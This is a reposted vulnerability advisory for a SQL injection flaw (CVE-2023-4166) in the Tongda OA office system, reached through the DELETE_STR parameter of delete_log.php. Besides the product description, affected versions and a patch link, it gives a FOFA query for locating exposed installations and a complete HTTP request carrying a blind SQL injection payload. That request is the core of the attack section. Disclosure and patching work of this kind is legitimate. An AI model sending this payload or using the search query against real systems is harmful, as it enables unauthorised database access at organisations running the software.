Tongda OA SQL injection vulnerability [CVE-2023-4166]

News 2023-08-11 21:44:35 views: null

Tongda OA SQL injection vulnerability [CVE-2023-4166]

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Product Introduction

Tongda OA system, namely Offic Anywhere, also known as network intelligent office system, is an office application system developed by Tongda Technology Company for office and management in various industries. Tongda OA system adopts the leading B/S architecture and adopts the development method based on WEB network, which can make the office of enterprises and individuals no longer subject to geographical restrictions, and realize informationization, automation, and mobile efficient and convenient office.

2. Vulnerability overview

Vulnerability 2 (CVE-2023-4166) in the general/system/seal_manage/dianju/delete_log.php file, the operation of the parameter DELETE_STR will lead to sql injection

3. Scope of influence

Tongda OA ≤ v11.10, v2017

insert image description here

Fourth, reproduce the environment

FOFA syntax: app="TDXK-Tongda OA" && icon_hash="-759108386"

POC

general/system/seal_manage/dianju/delete_log.php

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1) and (substr(DATABASE(),2,1))=char(68) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4n867pmrrp4nendg0tsngl7g70; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c74d7ebb
Connection: close

insert image description here

Xiaolong POC detection tool:

insert image description here
insert image description here

5. Repair suggestions

At present, the manufacturer has released an upgrade patch to fix the vulnerability. The link to obtain the patch is:
https://www.tongda2000.com/download/p2022.php

Guess you like

Origin blog.csdn.net/holyxp/article/details/132211748
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com